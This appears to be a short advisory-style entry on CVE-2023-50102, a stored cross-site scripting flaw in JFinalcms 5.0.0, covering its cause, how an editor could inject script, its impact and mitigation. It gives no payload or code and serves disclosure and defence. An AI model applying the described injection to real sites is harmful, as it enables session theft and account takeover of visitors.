CVE-2023-50102

Vulnerability

Description CVE-2023-50102 identifies a stored Cross-Site Scripting (XSS) vulnerability in JFinalcms version 5.0.0. The root cause lies in insufficient sanitization of user-supplied content data during storage, allowing malicious scripts to be persisted in the database and later executed in the browser of any user viewing the affected content.[2][3]

Exploitation

Vector An attacker with the ability to edit content (such as a user with admin or editor privileges) can inject arbitrary JavaScript or HTML into the content field. Because the input is not properly filtered or encoded before storage, the payload is saved as-is and then rendered without proper escaping when the content page is loaded. This means the attack can be triggered simply by visiting the affected page; no additional user interaction with a crafted link or attachment is required.[3]

Impact

Successful exploitation allows an attacker to execute arbitrary scripts in the context of the victim's browser session. This can lead to session token theft, account takeover, defacement of the site, or redirection to malicious sites. Since the payload is stored, every user who accesses the compromised content is at risk, making the impact broad and persistent until the injected data is removed.[2][3]

Mitigation

The official description only reports the vulnerability in JFinalcms 5.0.0. The vendor's GitHub page for the JFinal framework (not the CMS itself) shows that the latest version of the framework is 5.2.7, but no explicit patch or advisory for this XSS issue in JFinalcms has been published.[1] Users are advised to manually sanitize content input or upgrade to a patched version if available. As of the publication date, no workaround is provided beyond ensuring output encoding for all user-supplied content.